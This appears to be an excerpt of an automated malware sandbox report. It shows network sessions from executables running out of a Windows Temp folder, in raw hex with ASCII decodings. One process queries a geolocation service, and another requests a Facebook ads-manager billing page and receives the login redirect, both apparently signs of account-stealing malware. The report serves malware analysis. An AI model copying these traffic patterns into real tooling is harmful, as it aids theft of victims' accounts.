                                                                                                                                  2022-10-17 20:07:01 UTC323INData Raw: 57 79 31 4e 52 72 36 67 39 6e 45 6e 6c 39 59 59 64 5a 70 63 67 52 72 32 4e 6a 67 4d 6f 6d 37 41 33 4c 79 79 5a 37 45 39 53 68 47 34 41 69 33 55 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 32 39 34 32 34 36 22 2c 5b 22 52 65 61 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 22 2c 22 41 61 31 62 72 57 7a 44 70 38 46 31 50 79 46 63 75 75 33 6b 77 4a 36 4f 50 31 6d 77 6a 68 32 41 35 55 46 6b 5f 2d 48 6c 78 79 79 36 57 79 31 4e 52 72 36 67 39 6e 45 6e 6c 39 59 59 64 5a 70 63 67 52 72 32 4e 6a 67 4d 6f 6d 37 41 33 4c 79 79 5a 37 45 39 53 68 47 34 41 69 33 55 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 32 36 38 32 22 2c 5b 22 77 61 72 6e 69 6e 67 42 6c 75 65 69 73 68 22 5d 2c 7b 5f 5f 72 63 3a 5b
                                                                                                                                  Data Ascii: Wy1NRr6g9nEnl9YYdZpcgRr2NjgMom7A3LyyZ7E9ShG4Ai3U"]},-1],["cr:1294246",["ReactDOM.classic"],{__rc:["ReactDOM.classic","Aa1brWzDp8F1PyFcuu3kwJ6OP1mwjh2A5UFk_-Hlxyy6Wy1NRr6g9nEnl9YYdZpcgRr2NjgMom7A3LyyZ7E9ShG4Ai3U"]},-1],["cr:2682",["warningBlueish"],{__rc:[
                                                                                                                                  2022-10-17 20:07:01 UTC324INData Raw: 52 59 4e 76 7a 58 51 77 31 65 62 43 49 32 78 6a 54 6a 36 30 66 38 4d 6b 5f 61 53 69 4e 36 32 74 67 6f 39 72 4c 64 76 45 6f 41 62 30 4f 35 34 36 4b 43 58 51 37 69 6f 77 33 46 2d 66 73 71 79 33 55 44 47 30 5a 47 73 34 67 6f 62 77 61 76 33 34 37 6b 37 53 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 32 39 32 33 36 35 22 2c 5b 22 52 65 61 63 74 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 2c 22 41 61 32 42 44 55 4e 5a 38 48 57 32 71 74 34 6d 62 36 31 77 2d 6f 4a 48 55 71 4b 2d 4a 66 31 65 74 4c 35 6d 77 64 5f 4f 4b 55 54 76 62 37 5a 79 68 75 4a 7a 57 2d 36 35 4a 4e 5f 5a 41 36 7a 59 5f 68 5a 39 32 4b 64 38 35 75 73 72 76 70 35 37 64 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31
                                                                                                                                  Data Ascii: RYNvzXQw1ebCI2xjTj60f8Mk_aSiN62tgo9rLdvEoAb0O546KCXQ7iow3F-fsqy3UDG0ZGs4gobwav347k7SQ"]},-1],["cr:1292365",["React-prod.classic"],{__rc:["React-prod.classic","Aa2BDUNZ8HW2qt4mb61w-oJHUqK-Jf1etL5mwd_OKUTvb7ZyhuJzW-65JN_ZA6zY_hZ92Kd85usrvp57dQ"]},-1],["cr:1
                                                                                                                                  2022-10-17 20:07:01 UTC326INData Raw: 61 74 65 3d 31 22 7d 2c 33 30 33 32 5d 2c 5b 22 42 72 6f 77 73 65 72 50 61 79 6d 65 6e 74 48 61 6e 64 6c 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 65 6e 61 62 6c 65 64 3a 66 61 6c 73 65 7d 2c 33 39 30 34 5d 2c 5b 22 54 69 6d 65 53 70 65 6e 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 64 65 6c 61 79 3a 31 30 30 30 2c 74 69 6d 65 6f 75 74 3a 36 34 2c 22 30 5f 64 65 6c 61 79 22 3a 30 2c 22 30 5f 74 69 6d 65 6f 75 74 22 3a 38 7d 2c 31 34 32 5d 2c 5b 22 54 72 61 63 6b 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 64 6f 6d 61 69 6e 3a 22 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 22 7d 2c 33 32 35 5d 2c 5b 22 63 72 3a 31 33 35 31 37 34 31 22 2c 5b 22 43 6f 6d 65 74 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b
                                                                                                                                  Data Ascii: ate=1"},3032],["BrowserPaymentHandlerConfig",[],{enabled:false},3904],["TimeSpentConfig",[],{delay:1000,timeout:64,"0_delay":0,"0_timeout":8},142],["TrackingConfig",[],{domain:"https://pixel.facebook.com"},325],["cr:1351741",["CometEventListener"],{__rc:[
                                                                                                                                  2022-10-17 20:07:01 UTC327INData Raw: 22 2c 66 64 73 3a 36 30 2c 66 64 61 3a 36 30 2c 69 3a 36 30 2c 73 62 73 3a 31 2c 64 62 73 3a 31 30 30 2c 62 62 73 3a 31 30 30 2c 68 62 69 3a 36 30 2c 72 74 3a 32 36 32 31 34 34 2c 68 62 63 62 63 3a 32 2c 68 62 76 62 63 3a 30 2c 68 62 62 69 3a 33 30 2c 73 69 64 3a 2d 31 2c 68 62 76 3a 22 36 30 35 33 35 39 31 33 32 39 36 31 37 33 39 39 32 33 34 22 7d 5d 5d 2c 5b 22 4e 61 76 69 67 61 74 69 6f 6e 4d 65 74 72 69 63 73 22 2c 22 73 65 74 50 61 67 65 22 2c 5b 5d 2c 5b 7b 70 61 67 65 3a 22 58 57 65 62 4c 6f 67 69 6e 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 70 61 67 65 5f 74 79 70 65 3a 22 6e 6f 72 6d 61 6c 22 2c 70 61 67 65 5f 75 72 69 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74
                                                                                                                                  Data Ascii: ",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"6053591329617399234"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=htt
                                                                                                                                  2022-10-17 20:07:01 UTC329INData Raw: 2c 72 64 73 3a 7b 6d 3a 5b 22 43 6f 6e 74 65 78 74 75 61 6c 43 6f 6e 66 69 67 22 2c 22 42 6c 61 64 65 52 75 6e 6e 65 72 43 6c 69 65 6e 74 22 2c 22 44 47 57 52 65 71 75 65 73 74 53 74 72 65 61 6d 43 6c 69 65 6e 74 22 2c 22 4d 71 74 74 4c 6f 6e 67 50 6f 6c 6c 69 6e 67 52 75 6e 6e 65 72 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 72 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 2f 6f 35 59 76 4f 32 22 2c 22 48 4e 4a 6c 7a 30 66 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 45 42 56 67 65 4e 63 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 74 65 32 36 30 4c 65 22 2c 22 51 4d 54 46 61 33 6c 22 2c 22 6a 54 58 64 48 33 65 22 2c 22 63 59 55 33 63 33 32 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 45 46 31 68 57 6c 35 22 5d 7d 2c 62 65 3a 31 7d 2c 52
                                                                                                                                  Data Ascii: ,rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED"],r:["vcBcJjw","/o5YvO2","HNJlz0f","ZEC4RrQ","EBVgeNc","+RGtM0o","te260Le","QMTFa3l","jTXdH3e","cYU3c32","n6W4xMH","EF1hWl5"]},be:1},R


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  3192.168.2.549701162.0.217.254443C:\Users\user\AppData\Local\Temp\6246.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:04 UTC329OUTGET /geo.json HTTP/1.1
                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                  Host: api.2ip.ua
                                                                                                                                  2022-10-17 20:07:04 UTC329INHTTP/1.1 429 Too Many Requests
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:04 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  2022-10-17 20:07:04 UTC330INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  4192.168.2.54970331.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:09 UTC331OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:09 UTC331INHTTP/1.1 302 Found
                                                                                                                                  Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:09 UTC333INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  5192.168.2.54970431.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:09 UTC335OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:09 UTC336INHTTP/1.1 200 OK
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:09 UTC337INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                                  2022-10-17 20:07:09 UTC338INData Raw: 38 37 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f
                                                                                                                                  Data Ascii: 874f<!DOCTYPE html><html lang="en" id="faceboo
                                                                                                                                  2022-10-17 20:07:09 UTC338INData Raw: 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 42 67 54 73 38 71 46 4d 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 3f 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 45 6e 76 22 5d
                                                                                                                                  Data Ascii: k" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="BgTs8qFM">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"]
                                                                                                                                  2022-10-17 20:07:09 UTC340INData Raw: 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 77 65 62 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 79 62 2f 72 2f 68 4c 52 4a 31 47 47 5f 79 30 4a 2e
                                                                                                                                  Data Ascii: %2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.
                                                                                                                                  2022-10-17 20:07:09 UTC341INData Raw: 63 72 6f 73 73 2f 74 35 5a 54 68 7a 32 42 34 77 4e 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 4b 41 6a 62 72 6c 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 5f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 76 63 50 71 54 69 52 77 49 69 55 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 41
                                                                                                                                  Data Ascii: cross/t5ZThz2B4wN.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="KAjbrl/" crossorigin="anonymous" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/vcPqTiRwIiU.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="A
                                                                                                                                  2022-10-17 20:07:09 UTC343INData Raw: 2c 22 31 31 36 37 33 39 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 42 70 4e 2d 74 6c 55 50 77 62 49 49 46 67 6b 45 22 7d 2c 22 31 38 35 37 35 38 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 79 54 78 47 4d 70 36 6c 65 30 50 41 74 70 38 41 22 7d 2c 22 32 37 37 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 45 75 32 34 34 57 49 63 65 37 69 77 71 38 54 45 22 7d 2c 22 33 37 35 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 65 53 35 55 54 6b 6b 4d 70 5f 78 62 50 36 47 59 22 7d 2c 22 33 38 33 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 57 32
                                                                                                                                  Data Ascii: ,"1167394":{"result":false,"hash":"AT7BpN-tlUPwbIIFgkE"},"1857581":{"result":false,"hash":"AT5yTxGMp6le0PAtp8A"},"2772":{"result":false,"hash":"AT5Eu244WIce7iwq8TE"},"3752":{"result":false,"hash":"AT6eS5UTkkMp_xbP6GY"},"3831":{"result":false,"hash":"AT4W2
                                                                                                                                  2022-10-17 20:07:09 UTC344INData Raw: 22 3a 22 4e 6f 6e 65 22 7d 2c 22 64 70 72 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 69 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 73 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 73 74 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 53 74 72 69 63 74 22 7d 2c 22 69 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6c 6f 63 61 6c 65 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6d 5f 6c 73 22 3a 7b 22 74 22 3a 31 35 38 32 38 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6d 5f 70 69 78 65 6c 5f 72 61 74 69 6f 22 3a 7b 22 74
                                                                                                                                  Data Ascii: ":"None"},"dpr":{"t":604800,"s":"None"},"fbl_ci":{"t":31536000,"s":"None"},"fbl_cs":{"t":31536000,"s":"None"},"fbl_st":{"t":31536000,"s":"Strict"},"i_user":{"s":"None"},"locale":{"t":604800,"s":"None"},"m_ls":{"t":158284800,"s":"None"},"m_pixel_ratio":{"t
                                                                                                                                  2022-10-17 20:07:09 UTC346INData Raw: 69 66 65 73 74 5f 6f 72 69 67 69 6e 22 3a 6e 75 6c 6c 2c 22 62 65 5f 6f 6e 65 5f 61 68 65 61 64 22 3a 66 61 6c 73 65 2c 22 69 73 5f 72 74 6c 22 3a 66 61 6c 73 65 2c 22 69 73 5f 63 6f 6d 65 74 22 3a 66 61 6c 73 65 2c 22 69 73 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 74 69 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 5f 6a 69 74 5f 77 61 72 6d 65 64 5f 75 70 22 3a 74 72 75 65 2c 22 68 73 69 22 3a 22 37 31 35 35 35 37 35 34 31 33 32 35 35 38 36 31 32 35 32 22 2c 22 73 65 6d 72 5f 68 6f 73 74 5f 62 75 63 6b 65 74 22 3a 22 33 22 2c 22 62 6c 5f 68 61 73 68 5f 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 6b 69 70 5f 72 64 5f 62 6c 22 3a 74 72 75 65 2c 22 63 6f 6d 65 74 5f 65 6e 76 22 3a 30 2c 22 77 62 6c 6f 6b 73 5f 65 6e 76 22 3a 66 61 6c 73 65 2c 22 73 70 69 6e 22 3a 34
